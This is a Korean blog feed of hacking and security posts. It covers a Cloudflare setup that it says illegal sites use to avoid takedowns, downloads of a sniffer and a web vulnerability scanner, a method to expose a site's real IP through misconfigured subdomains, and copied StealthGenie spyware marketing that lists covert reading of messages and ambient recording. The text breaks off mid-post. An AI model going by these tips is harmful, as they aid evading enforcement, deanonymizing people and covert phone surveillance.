영삼넷: 해킹&보안 카테고리 글 목록https://youngsam.net/IT 강국 = 김영삼 블로그에 오신걸 환영합니다.2023-11-23T14:07:21+09:00Textcube 1.10.9 : Tempo primo무료&유료 DNS 및 HTTPS 서비스를 무료 지원 사이트openkrhttps://youngsam.net/entry/%EB%AC%B4%EB%A3%8C%EC%9C%A0%EB%A3%8C-DNS-%EB%B0%8F-HTTPS-%EC%84%9C%EB%B9%84%EC%8A%A4%EB%A5%BC-%EB%AC%B4%EB%A3%8C-%EC%A7%80%EC%9B%90-%EC%82%AC%EC%9D%B4%ED%8A%B82019-10-30T15:01:55+09:002019-10-30T15:01:55+09:00https://dash.cloudflare.com<br /><br />입니다.<br /><br />HTTPS 서비스까지 무료 지원 합니다. SSL 인증서 없이 DNS 레코드만 등록하면 됩니다.<br /><br />불법 사이트에서 많이 사용하는데 무료 서비스도 안정적이지만 속도가 조금 불만 스럽다면 유료 서비스 진행 하셔도 <br /><br />좋을듯 합니다.<br /><br />CloudFlare 구글링 하면 쉽게 사용법 나와 있습니다. <br /><br />보충 설명 하자면 DNS , DDOS(디도스) , CDN , SSL , PAGE RULL 이런 기능들이 무료입니다.<p><strong><a href="https://youngsam.net/entry/%EB%AC%B4%EB%A3%8C%EC%9C%A0%EB%A3%8C-DNS-%EB%B0%8F-HTTPS-%EC%84%9C%EB%B9%84%EC%8A%A4%EB%A5%BC-%EB%AC%B4%EB%A3%8C-%EC%A7%80%EC%9B%90-%EC%82%AC%EC%9D%B4%ED%8A%B8?commentInput=true#entry2055WriteComment">댓글 쓰기</a></strong></p>네트워크 패킷 캡쳐 프로그램 SmartSniff - 한글판openkrhttps://youngsam.net/entry/%EB%84%A4%ED%8A%B8%EC%9B%8C%ED%81%AC-%ED%8C%A8%ED%82%B7-%EC%BA%A1%EC%B3%90-%ED%94%84%EB%A1%9C%EA%B7%B8%EB%9E%A8-SmartSniff-12019-05-09T10:59:46+09:002019-05-09T10:59:29+09:00스마트 패킷 스니퍼 프로그램 입니다. <br /><br />네트워크 패킷 캡쳐 프로그램 SmartSniff 스마트 스니퍼 프로그램을 이용하여 네트워크 패킷을 확인함<div class="imageblock center" style="text-align: center; clear: both;"><a class="extensionIcon" href="https://www.youngsam.net/attachment/3191209783.zip"><img src="https://youngsam.net/resources/image/extension/unknown.gif" alt="" /> </a></div><p><strong><a href="https://youngsam.net/entry/%EB%84%A4%ED%8A%B8%EC%9B%8C%ED%81%AC-%ED%8C%A8%ED%82%B7-%EC%BA%A1%EC%B3%90-%ED%94%84%EB%A1%9C%EA%B7%B8%EB%9E%A8-SmartSniff-1?commentInput=true#entry2027WriteComment">댓글 쓰기</a></strong></p>웹 취약점 진단툴openkrhttps://youngsam.net/entry/%EC%9B%B9-%EC%B7%A8%EC%95%BD%EC%A0%90-%EC%A7%84%EB%8B%A8%ED%88%B42018-08-03T12:34:13+09:002018-08-03T12:34:10+09:00<div>지원 OS : 윈도우 </div>
<div></div>
<div>개발환경 : QT(C++) </div>
<div></div>
<div>사용제한 : 사용제한없음 </div>
<div></div>
<div>자료설명 : </div>
<div></div>
<div>ahoonScanner </div>
<div></div>
<div>- 패턴 및 시그니처 기반 웹 취약점 진단툴 </div>
<div>- SQL 인젝션, XSS, 다운로드, 정보노출 등등 </div>
<div>- 결과 화면 캡쳐, 보고서, 실시간 보기 기능 </div>
<div></div>
<div>보다 자세한 도움말 이용. </div>
<div></div>
<div>다운로드는 아래 링크에서 받으면 됩니다. </div>
<div></div>
<div>https://drive.google.com/file/d/0Bw865yAScbYfYXQzSUQ5NllwWU0/view <br /><br /><div class="imageblock center" style="text-align: center; clear: both;"><a class="extensionIcon" href="https://www.youngsam.net/attachment/2482442254.zip"><img src="https://youngsam.net/resources/image/extension/zip.gif" alt="" /> ahoonwebscanner_portable.zip</a></div></div>
<div></div>
<div></div>
<div>주의) 타 사이트 이용시 법적 문제가 될 수 있으니 참고하시기 바랍니다.</div><p><strong><a href="https://youngsam.net/entry/%EC%9B%B9-%EC%B7%A8%EC%95%BD%EC%A0%90-%EC%A7%84%EB%8B%A8%ED%88%B4?commentInput=true#entry1934WriteComment">댓글 쓰기</a></strong></p>Cloudflare CDN 서브 도메인 실수 하면 진짜 IP 잡을수 있습니다openkrhttps://youngsam.net/entry/Cloudflare-CDN-%EC%84%9C%EB%B8%8C-%EB%8F%84%EB%A9%94%EC%9D%B8-%EC%9C%BC%EB%A1%9C-%EC%A7%84%EC%A7%9C-IP-%EC%9E%A1%EC%9D%84%EC%88%98-%EC%9E%88%EC%8A%B5%EB%8B%88%EB%8B%A42017-03-23T01:27:54+09:002017-03-23T01:17:32+09:00오늘 오전 친구 전화가 왔네요 ㅜㅜ <br /><br />완전 불법은 아니지만 불안해서 서버는 한국에 놓고 Cloudflare CDN 을 통해서 진짜 IP 를 감추는 작업을 하고 혹시 모르니<br /><br />테스트 한번 부탁한다고 연락이 왔습니다. <br /><br />통상 Cloudflare CDN 으로 IP 를 우회 한다면 도메인 정보만 가지고 한국에 있는 IP 를 알기는 힘든 일입니다. 그래서 대한민국 <br /><br />불법 사이트를 운영해도 문체부 및 사이버수사 등에서 아무 역활도 못하고 도메인 차단만 하고 있습니다. 도메인 차단 한다고해도 <br /><br />HTTPS 로 구성하면 일반 사용자도 접속할수 있습니다 아직까지 HTTPS 로 구성하면 불법 사이트 접속 차단 어렵습니다. 아마도 <br /><br />저작권 관리하는 문화체육관광부(산하) 에서 토렌트등 불법 사이트 수사를 진행 하고 있으나 전문적 지식없이 공개 소스로 호스팅 받아서 홈페이지 운영해서 토렌트 파일 몇개 올리는 이런 사이트만 단속하고 있습니다. <br /><br />이런 일반 사이트 (PING 도메인) 으로 IP 확인후 http://whois.kisa.or.kr/kor/main.jsp 사이트 통해서 통신사 까지 확인하고 다급한 상황이 아니면 공문을 통해서 IP 위치 파악후 압수 수색영장 받아서 압수수색합니다.ㅋㅋ <br /><br />초등학생이 멋모르고 압수수색영장 가지고 쳐들어오면 무섭겠죠!<br /><br />이렇게 조사해서 검찰로 넘기는 역활 까지 하는듯 합니다. 그러면 MBC 에서 문체부 최고에 기술력으로 토렌트 불법 사이트 집중 단촉 성과 100% 이런 기사가 나오죠. <br /><br />멋모르고 걸린 사람은 벌금 1천만원 정도 나오죠. 이렇게 잘 아는 이유는 예전 토렌트 수집기를 개발해서 시험삼아 구동중 구글에서 수집해 가는걸 모르고 있다가 . 나중에 알게되어 사이트 접속을 차단 했습니다.<br /><br />이후 문체부 에서 압수수색 영장을 가지고 사무실로 왔더군요. 운영도 안하고 접속도 안된다고 했는데 그냥 이유 없이 실적이구나 생각했는지 PC를 검색 하기 시작합니다. TORRENT 파일은 없고 개발 소스등이 나왔는데 . <br /><br />이후부터 대전까지가서 조사를 받기 시작 했습니다. <br /><br />아마 10번 정도 갔듯 합니다. 직원들도 조사 받았어요 ㅜㅜ 젠장<br /><br />이후 검찰로 넘어가서 벌금 1천만원이 나왔네요. <br /><br />귀찮아서 그냥인정하고 벌금 내고 끝나긴 했지만. 혹시 불법,사이트운영,수익, 등을 생각했다면 <br /><br />당장 Cloudflare CDN 통해서 운영했을텐데 그럼 절대 못잡을건데 돈 천만원만 날렸네. ㅋㅋ<br /><br />각설하고 <br /><br />통상 Cloudflare 통해서 도메인을 숨기는 작업을 합니다. <br /><br />그리고 차단을 막기 위해 HTTPS 로 리다이렉트 시키죠 하지만 실수로 개발중 서브 도메인을 실 IP 로 연결 하는 경우가 종종 있습니다.<br /><br /><br />이를 확인하는 방법입니다.<br /><br />
<div>Cloudflare Resolver라는 사이트가 있습니다 이곳에서 검색해 보십시오 . <br /><br /></div>
<div><a title="https://exonapps.nl/cfresolver/index.php" href="https://exonapps.nl/cfresolver/index.php">https://exonapps.nl/cfresolver/index.php<br /></a></div>
<br />CloudFlare 에서 사용중인 NS 이름에 대한 레코드에 연결된 IP를 확인할수 있습니다. 친구 도메인 검색하니 FTP IP 가 확인되네요<br /><br />친구에게 전화해서 알려주었습니다.<br /><br />PS : 게시판 에 글쓰는 방법으로 관리자 IP 를 알수 있습니다. 눈치 빠른 분들 만 챙겨 가세요 ^^<p><strong><a href="https://youngsam.net/entry/Cloudflare-CDN-%EC%84%9C%EB%B8%8C-%EB%8F%84%EB%A9%94%EC%9D%B8-%EC%9C%BC%EB%A1%9C-%EC%A7%84%EC%A7%9C-IP-%EC%9E%A1%EC%9D%84%EC%88%98-%EC%9E%88%EC%8A%B5%EB%8B%88%EB%8B%A4?commentInput=true#entry1866WriteComment">댓글 쓰기</a></strong></p>아직도 스마트폰 도청 위치추적 APP 이 있습니다.openkrhttps://youngsam.net/entry/%EC%95%84%EC%A7%81%EB%8F%84-%EC%8A%A4%EB%A7%88%ED%8A%B8%ED%8F%B0-%EB%8F%84%EC%B2%AD-%EC%9C%84%EC%B9%98%EC%B6%94%EC%A0%81-APP-%EC%9D%B4-%EC%9E%88%EC%8A%B5%EB%8B%88%EB%8B%A42017-03-22T21:05:22+09:002017-03-22T18:51:20+09:00<p>스마트폰 처음 구입 후 이런 저런 프로그램 을 개발 하면서 스마트폰 위치추적이 너무 쉽게 이루어 지는걸 보고 이후 파장이 염려 되었습니다.</p>
<p> </p>
<p>2010년도 개발한 스마트폰 위치 추적이 지금도 되는걸 보고 구글에서는 뭘 하는지. ?</p>
<p> </p>
<p>오늘 SPYCELLPHONE 사이트에 접속 하였습니다. 이렇게 공지가 뜨네요</p>
<p> </p>
<p><img src="https://youngsam.net/attach/1/1212446577.png" /></p>
<p> </p>
<p>내용을 한국어로 번역하면 나오는 내용입니다.</p>
<p> </p>
<p><img src="https://youngsam.net/attach/1/7293838317.png" /></p>
<p> </p>
<p>더 이상 법적인 문제로 일시적으로 폐쇄 되었다 합니다.</p>
<p> </p>
<p>사이트를 이리저리 보던 중</p>
<p style="text-align: center;"> </p>
<p style="text-align: center;"><img src="https://youngsam.net/attach/1/7264363611.png" /></p>
<p style="text-align: center;"> </p>
<p>이런 사진이 있네요 . 카카오톡 스파이가 가능하다는 내용과 함께. 자세히 다른 내용을 들여다 보니 아직도 가능 하다는 내용입니다.</p>
<p> </p>
<p>기존 내용 입니다.</p>
<p>기능 긁어 와서 붙여 넣기 하겠습니다.</p>
<p> </p>
<h2><span style="color: #303030; font-size: 21pt;"><span style="font-family: 맑은 고딕;">기본</span> </span></h2>
<p style="background: white;"><span style="color: #3e3e3e;"><span style="font-family: Helvetica;">StealthGenie</span><span style="font-family: 맑은 고딕;">는</span> <span style="font-family: 맑은 고딕;">다른</span> <span style="font-family: 맑은 고딕;">모바일</span> <span style="font-family: 맑은 고딕;">스파이</span> <span style="font-family: 맑은 고딕;">소프트웨어가</span> <span style="font-family: 맑은 고딕;">제공하는</span> <span style="font-family: 맑은 고딕;">기본적인</span> <span style="font-family: 맑은 고딕;">기능과</span> <span style="font-family: 맑은 고딕;">더불어</span> <span style="font-family: 맑은 고딕;">몇몇</span> <span style="font-family: 맑은 고딕;">실용적인</span> <span style="font-family: 맑은 고딕;">추가</span> <span style="font-family: 맑은 고딕;">기능을</span> <span style="font-family: 맑은 고딕;">제공합니다</span><span style="font-family: Helvetica;">. '</span><span style="font-family: 맑은 고딕;">베이직</span><span style="font-family: Helvetica;">' </span><span style="font-family: 맑은 고딕;">월간</span> <span style="font-family: 맑은 고딕;">플랜으로</span> <span style="font-family: 맑은 고딕;">통화</span> <span style="font-family: 맑은 고딕;">내역</span> <span style="font-family: 맑은 고딕;">모니터링</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">주고</span> <span style="font-family: 맑은 고딕;">받은</span><span style="font-family: Helvetica;"> SMS </span><span style="font-family: 맑은 고딕;">메시지</span> <span style="font-family: 맑은 고딕;">모두</span> <span style="font-family: 맑은 고딕;">읽기</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">연락처와</span> <span style="font-family: 맑은 고딕;">북마크</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">약속과</span> <span style="font-family: 맑은 고딕;">달력</span> <span style="font-family: 맑은 고딕;">정보</span> <span style="font-family: 맑은 고딕;">보기</span> <span style="font-family: 맑은 고딕;">등이</span> <span style="font-family: 맑은 고딕;">가능합니다</span><span style="font-family: Helvetica;">. StealthGenie </span><span style="font-family: 맑은 고딕;">베이직은</span> <span style="font-family: 맑은 고딕;">또한</span> <span style="font-family: 맑은 고딕;">실시간</span><span style="font-family: Helvetica;"> GPS </span><span style="font-family: 맑은 고딕;">감시와</span> <span style="font-family: 맑은 고딕;">위치</span> <span style="font-family: 맑은 고딕;">히스토리</span> <span style="font-family: 맑은 고딕;">기능을</span> <span style="font-family: 맑은 고딕;">제공합니다</span><span style="font-family: Helvetica;">. <br /><br /></span><span style="font-family: 맑은 고딕;">많은</span> <span style="font-family: 맑은 고딕;">사람들에게</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">이</span> <span style="font-family: 맑은 고딕;">기능으로</span> <span style="font-family: 맑은 고딕;">충분할</span> <span style="font-family: 맑은 고딕;">것입니다</span><span style="font-family: Helvetica;">. StealthGenie </span><span style="font-family: 맑은 고딕;">베이직은</span> <span style="font-family: 맑은 고딕;">이</span> <span style="font-family: 맑은 고딕;">기능들을</span> <span style="font-family: 맑은 고딕;">훌륭하게</span> <span style="font-family: 맑은 고딕;">수행하며</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">예를</span> <span style="font-family: 맑은 고딕;">들어</span> <span style="font-family: 맑은 고딕;">자녀들의</span> <span style="font-family: 맑은 고딕;">행방을</span> <span style="font-family: 맑은 고딕;">대략적으로</span> <span style="font-family: 맑은 고딕;">지펴</span> <span style="font-family: 맑은 고딕;">보기만을</span> <span style="font-family: 맑은 고딕;">원하는</span> <span style="font-family: 맑은 고딕;">이들에게는</span> <span style="font-family: 맑은 고딕;">아마도</span> <span style="font-family: 맑은 고딕;">이</span> <span style="font-family: 맑은 고딕;">기능들이</span> <span style="font-family: 맑은 고딕;">스파이</span> <span style="font-family: 맑은 고딕;">전화기</span> <span style="font-family: 맑은 고딕;">앱에서</span> <span style="font-family: 맑은 고딕;">필요한</span> <span style="font-family: 맑은 고딕;">전부일</span> <span style="font-family: 맑은 고딕;">것입니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">고급</span> <span style="font-family: 맑은 고딕;">기능을</span> <span style="font-family: 맑은 고딕;">사용할</span> <span style="font-family: 맑은 고딕;">시간이나</span> <span style="font-family: 맑은 고딕;">의향이</span> <span style="font-family: 맑은 고딕;">없다면</span><span style="font-family: Helvetica;">, StealthGenie </span><span style="font-family: 맑은 고딕;">베이직은</span> <span style="font-family: 맑은 고딕;">꽤</span> <span style="font-family: 맑은 고딕;">낮은</span> <span style="font-family: 맑은 고딕;">월</span> <span style="font-family: 맑은 고딕;">서비스</span> <span style="font-family: 맑은 고딕;">가격으로</span> <span style="font-family: 맑은 고딕;">모든</span> <span style="font-family: 맑은 고딕;">일반적인</span> <span style="font-family: 맑은 고딕;">기능을</span> <span style="font-family: 맑은 고딕;">수행합니다</span><span style="font-family: Helvetica;">. </span></span></p>
<h3><span style="color: #303030; font-size: 21pt;"><span style="font-family: 맑은 고딕;">고급</span> <span style="font-family: 맑은 고딕;">기능</span> </span></h3>
<p style="background: white;"><span style="color: #3e3e3e;"><span style="font-family: 맑은 고딕;">그러나</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">이</span> <span style="font-family: 맑은 고딕;">제품을</span> <span style="font-family: 맑은 고딕;">오늘날</span> <span style="font-family: 맑은 고딕;">시중에</span> <span style="font-family: 맑은 고딕;">나와있는</span> <span style="font-family: 맑은 고딕;">모바일</span> <span style="font-family: 맑은 고딕;">스파이</span> <span style="font-family: 맑은 고딕;">앱</span> <span style="font-family: 맑은 고딕;">중에서</span> <span style="font-family: 맑은 고딕;">유일무이한</span> <span style="font-family: 맑은 고딕;">것으로</span> <span style="font-family: 맑은 고딕;">만드는</span> <span style="font-family: 맑은 고딕;">것은</span><span style="font-family: Helvetica;"> StealthGenie</span><span style="font-family: 맑은 고딕;">의</span> <span style="font-family: 맑은 고딕;">고급</span> <span style="font-family: 맑은 고딕;">기능입니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">혁신적인</span> <span style="font-family: 맑은 고딕;">것들은</span> <span style="font-family: 맑은 고딕;">매달</span> <span style="font-family: 맑은 고딕;">단지</span> <span style="font-family: 맑은 고딕;">몇달러의</span> <span style="font-family: 맑은 고딕;">추가</span> <span style="font-family: 맑은 고딕;">비용밖에</span> <span style="font-family: 맑은 고딕;">들지</span> <span style="font-family: 맑은 고딕;">않는</span><span style="font-family: Helvetica;"> StealthGenie '</span><span style="font-family: 맑은 고딕;">골드</span><span style="font-family: Helvetica;">' </span><span style="font-family: 맑은 고딕;">패지키와</span> <span style="font-family: 맑은 고딕;">함께</span> <span style="font-family: 맑은 고딕;">제공됩니다</span><span style="font-family: Helvetica;">. </span></span></p>
<h4><span style="color: #303030; font-size: 15pt;"><strong><span style="font-family: 맑은 고딕;">가상</span> <span style="font-family: 맑은 고딕;">경계</span> <span style="font-family: 맑은 고딕;">설정</span></strong> </span></h4>
<p style="background: white;"><span style="color: #3e3e3e;"><span style="font-family: 맑은 고딕;">이</span> <span style="font-family: 맑은 고딕;">회사가</span> <span style="font-family: 맑은 고딕;">개발한</span> <span style="font-family: 맑은 고딕;">멋진</span> <span style="font-family: 맑은 고딕;">기능</span> <span style="font-family: 맑은 고딕;">중</span> <span style="font-family: 맑은 고딕;">하나는</span><span style="font-family: Helvetica;"> '</span><span style="font-family: 맑은 고딕;">가상</span> <span style="font-family: 맑은 고딕;">경계</span> <span style="font-family: 맑은 고딕;">설정</span><span style="font-family: Helvetica;">' </span><span style="font-family: 맑은 고딕;">기능입니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">가상</span> <span style="font-family: 맑은 고딕;">경계</span> <span style="font-family: 맑은 고딕;">설정을</span> <span style="font-family: 맑은 고딕;">사용해서</span> <span style="font-family: 맑은 고딕;">여러분은</span> <span style="font-family: 맑은 고딕;">대상</span> <span style="font-family: 맑은 고딕;">전화기와</span> <span style="font-family: 맑은 고딕;">그</span> <span style="font-family: 맑은 고딕;">전화기의</span> <span style="font-family: 맑은 고딕;">사용자가</span> <span style="font-family: 맑은 고딕;">여러분이</span> <span style="font-family: 맑은 고딕;">안전하다고</span> <span style="font-family: 맑은 고딕;">지정한</span> <span style="font-family: 맑은 고딕;">지역을</span> <span style="font-family: 맑은 고딕;">떠나거나</span> <span style="font-family: 맑은 고딕;">위험</span> <span style="font-family: 맑은 고딕;">또는</span> <span style="font-family: 맑은 고딕;">금지된</span> <span style="font-family: 맑은 고딕;">것으로</span> <span style="font-family: 맑은 고딕;">여겼던</span> <span style="font-family: 맑은 고딕;">지역에</span> <span style="font-family: 맑은 고딕;">들어가는</span> <span style="font-family: 맑은 고딕;">때를</span> <span style="font-family: 맑은 고딕;">알려주는</span><span style="font-family: Helvetica;"> '</span><span style="font-family: 맑은 고딕;">안전</span><span style="font-family: Helvetica;">' </span><span style="font-family: 맑은 고딕;">지역과</span><span style="font-family: Helvetica;"> '</span><span style="font-family: 맑은 고딕;">제한</span><span style="font-family: Helvetica;">' </span><span style="font-family: 맑은 고딕;">지역</span> <span style="font-family: 맑은 고딕;">경계경보를</span> <span style="font-family: 맑은 고딕;">설정할</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있습니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">이</span> <span style="font-family: 맑은 고딕;">구역들은</span> <span style="font-family: 맑은 고딕;">개인</span> <span style="font-family: 맑은 고딕;">계정의</span> <span style="font-family: 맑은 고딕;">제어판에</span> <span style="font-family: 맑은 고딕;">있는</span> <span style="font-family: 맑은 고딕;">지도</span> <span style="font-family: 맑은 고딕;">디스플레이를</span> <span style="font-family: 맑은 고딕;">사용해서</span> <span style="font-family: 맑은 고딕;">쉽게</span> <span style="font-family: 맑은 고딕;">지정할</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있습니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">이</span> <span style="font-family: 맑은 고딕;">기능은</span> <span style="font-family: 맑은 고딕;">특히</span> <span style="font-family: 맑은 고딕;">자녀들의</span> <span style="font-family: 맑은 고딕;">행방과</span> <span style="font-family: 맑은 고딕;">이동을</span> <span style="font-family: 맑은 고딕;">추적하기</span> <span style="font-family: 맑은 고딕;">위해</span> <span style="font-family: 맑은 고딕;">모바일</span> <span style="font-family: 맑은 고딕;">스파이웨어</span> <span style="font-family: 맑은 고딕;">구입에</span> <span style="font-family: 맑은 고딕;">관심을</span> <span style="font-family: 맑은 고딕;">가지는</span> <span style="font-family: 맑은 고딕;">부모들에게</span> <span style="font-family: 맑은 고딕;">유용합니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">안전</span> <span style="font-family: 맑은 고딕;">구역으로</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">여러분은</span> <span style="font-family: 맑은 고딕;">여러분의</span> <span style="font-family: 맑은 고딕;">십대가</span> <span style="font-family: 맑은 고딕;">학교에서</span> <span style="font-family: 맑은 고딕;">일찍</span> <span style="font-family: 맑은 고딕;">나왔는지</span> <span style="font-family: 맑은 고딕;">또는</span> <span style="font-family: 맑은 고딕;">공부를</span> <span style="font-family: 맑은 고딕;">해야</span> <span style="font-family: 맑은 고딕;">하는</span> <span style="font-family: 맑은 고딕;">시간에</span> <span style="font-family: 맑은 고딕;">집에서</span> <span style="font-family: 맑은 고딕;">벗어나</span> <span style="font-family: 맑은 고딕;">있는지를</span> <span style="font-family: 맑은 고딕;">알</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있습니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">제한</span> <span style="font-family: 맑은 고딕;">구역은</span> <span style="font-family: 맑은 고딕;">대상</span> <span style="font-family: 맑은 고딕;">전화기가</span> <span style="font-family: 맑은 고딕;">전화기</span> <span style="font-family: 맑은 고딕;">사용자에게</span> <span style="font-family: 맑은 고딕;">출입금지인</span> <span style="font-family: 맑은 고딕;">지역에</span> <span style="font-family: 맑은 고딕;">들어서는지를</span> <span style="font-family: 맑은 고딕;">알려</span> <span style="font-family: 맑은 고딕;">줍니다</span><span style="font-family: Helvetica;">. </span></span></p>
<p style="background: white;"><span style="color: #303030;"><span style="font-size: 15pt;"><strong><span style="font-family: 맑은 고딕;">메신저</span><span style="font-family: Helvetica;">, Viber</span><span style="font-family: 맑은 고딕;">및</span> <span style="font-family: 맑은 고딕;">스카이프</span> <span style="font-family: 맑은 고딕;">추적</span> <span style="font-family: 맑은 고딕;">관찰</span></strong></span> </span></p>
<p style="background: white;"><span style="color: #3e3e3e;"><span style="font-family: Helvetica;">StealthGenie </span><span style="font-family: 맑은 고딕;">골드를</span> <span style="font-family: 맑은 고딕;">사용하면</span> <span style="font-family: 맑은 고딕;">스카이프</span> <span style="font-family: 맑은 고딕;">통화</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">메시지와</span> <span style="font-family: 맑은 고딕;">연락처</span> <span style="font-family: 맑은 고딕;">뿐</span> <span style="font-family: 맑은 고딕;">아니라</span><span style="font-family: Helvetica;"> WhatsApp</span><span style="font-family: 맑은 고딕;">과</span><span style="font-family: Helvetica;"> iMessage </span><span style="font-family: 맑은 고딕;">채팅</span><span style="font-family: Helvetica;">, Viber </span><span style="font-family: 맑은 고딕;">통화와</span> <span style="font-family: 맑은 고딕;">메시지에도</span> <span style="font-family: 맑은 고딕;">접속할</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있습니다</span><span style="font-family: Helvetica;">. </span></span></p>
<p style="background: white;"><span style="color: #303030;"><span style="font-size: 15pt;"><strong><span style="font-family: 맑은 고딕;">이메일</span> <span style="font-family: 맑은 고딕;">추적</span> <span style="font-family: 맑은 고딕;">관찰</span></strong></span><span style="font-family: Helvetica;"><span style="font-size: 15pt;"><strong> </strong></span> </span></span></p>
<p style="background: white;"><span style="color: #3e3e3e;"><span style="font-family: Helvetica;">StealthGenie </span><span style="font-family: 맑은 고딕;">골드를</span> <span style="font-family: 맑은 고딕;">사용하면</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">사용자는</span><span style="font-family: Helvetica;"> Gmail</span><span style="font-family: 맑은 고딕;">에</span> <span style="font-family: 맑은 고딕;">접속해서</span> <span style="font-family: 맑은 고딕;">주고</span> <span style="font-family: 맑은 고딕;">받은</span> <span style="font-family: 맑은 고딕;">이메일을</span> <span style="font-family: 맑은 고딕;">읽을</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있습니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">많은</span> <span style="font-family: 맑은 고딕;">스파이</span> <span style="font-family: 맑은 고딕;">앱은</span> <span style="font-family: 맑은 고딕;">전화기의</span> <span style="font-family: 맑은 고딕;">이메일</span> <span style="font-family: 맑은 고딕;">기능에만</span> <span style="font-family: 맑은 고딕;">접근할</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있을</span> <span style="font-family: 맑은 고딕;">뿐</span><span style="font-family: Helvetica;">, Gmail </span><span style="font-family: 맑은 고딕;">계정</span> <span style="font-family: 맑은 고딕;">접근이</span> <span style="font-family: 맑은 고딕;">가능하지</span> <span style="font-family: 맑은 고딕;">않습니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">이것은</span> <span style="font-family: 맑은 고딕;">어떤</span> <span style="font-family: 맑은 고딕;">이들이</span> <span style="font-family: 맑은 고딕;">아주</span> <span style="font-family: 맑은 고딕;">유용하게</span> <span style="font-family: 맑은 고딕;">생각할</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있는</span> <span style="font-family: 맑은 고딕;">기능</span> <span style="font-family: 맑은 고딕;">중</span> <span style="font-family: 맑은 고딕;">하나입니다</span><span style="font-family: Helvetica;">. </span></span></p>
<h4><span style="color: #303030; font-size: 15pt;"><strong><span style="font-family: 맑은 고딕;">주변</span> <span style="font-family: 맑은 고딕;">소리</span> <span style="font-family: 맑은 고딕;">녹음</span></strong> </span></h4>
<p style="background: white;"><span style="color: #3e3e3e;"><span style="font-family: 맑은 고딕;">이</span> <span style="font-family: 맑은 고딕;">기능으로</span> <span style="font-family: 맑은 고딕;">대상</span> <span style="font-family: 맑은 고딕;">전화기의</span> <span style="font-family: 맑은 고딕;">주변</span> <span style="font-family: 맑은 고딕;">소리를</span> <span style="font-family: 맑은 고딕;">듣고</span> <span style="font-family: 맑은 고딕;">녹음할</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있습니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">이</span> <span style="font-family: 맑은 고딕;">기능은</span> <span style="font-family: 맑은 고딕;">전화기를</span> <span style="font-family: 맑은 고딕;">대화나</span> <span style="font-family: 맑은 고딕;">전화기의</span> <span style="font-family: 맑은 고딕;">인근에서</span> <span style="font-family: 맑은 고딕;">발생하는</span> <span style="font-family: 맑은 고딕;">다른</span> <span style="font-family: 맑은 고딕;">활동을</span> <span style="font-family: 맑은 고딕;">듣는</span> <span style="font-family: 맑은 고딕;">도청</span> <span style="font-family: 맑은 고딕;">장치로</span> <span style="font-family: 맑은 고딕;">사용할</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있게</span> <span style="font-family: 맑은 고딕;">해줍니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">많은</span> <span style="font-family: 맑은 고딕;">사람들이</span> <span style="font-family: 맑은 고딕;">이것을</span> <span style="font-family: 맑은 고딕;">상당히</span> <span style="font-family: 맑은 고딕;">매력적인</span> <span style="font-family: 맑은 고딕;">기능으로</span> <span style="font-family: 맑은 고딕;">보고</span> <span style="font-family: 맑은 고딕;">있으며</span> <span style="font-family: 맑은 고딕;">현재</span> <span style="font-family: 맑은 고딕;">대부분의</span> <span style="font-family: 맑은 고딕;">훌륭한</span> <span style="font-family: 맑은 고딕;">스파이</span> <span style="font-family: 맑은 고딕;">앱은</span> <span style="font-family: 맑은 고딕;">자신들의</span> <span style="font-family: 맑은 고딕;">패키지에서</span> <span style="font-family: 맑은 고딕;">이</span> <span style="font-family: 맑은 고딕;">기능을</span> <span style="font-family: 맑은 고딕;">제공하고</span> <span style="font-family: 맑은 고딕;">있습니다</span> </span></p>
<p style="background: white;"><span style="color: #303030;"><span style="font-size: 15pt;"><strong><span style="font-family: 맑은 고딕;">멀티미디어</span> <span style="font-family: 맑은 고딕;">접금</span></strong></span> </span></p>
<p style="background: white;"><span style="color: #3e3e3e;"><span style="font-family: Helvetica;">StealthGenie </span><span style="font-family: 맑은 고딕;">골드를</span> <span style="font-family: 맑은 고딕;">사용하면</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">사진과</span> <span style="font-family: 맑은 고딕;">동영상을</span> <span style="font-family: 맑은 고딕;">볼</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있으며</span> <span style="font-family: 맑은 고딕;">전화기에</span> <span style="font-family: 맑은 고딕;">저장된</span> <span style="font-family: 맑은 고딕;">음악</span> <span style="font-family: 맑은 고딕;">파일도</span> <span style="font-family: 맑은 고딕;">들을</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있습니다</span><span style="font-family: 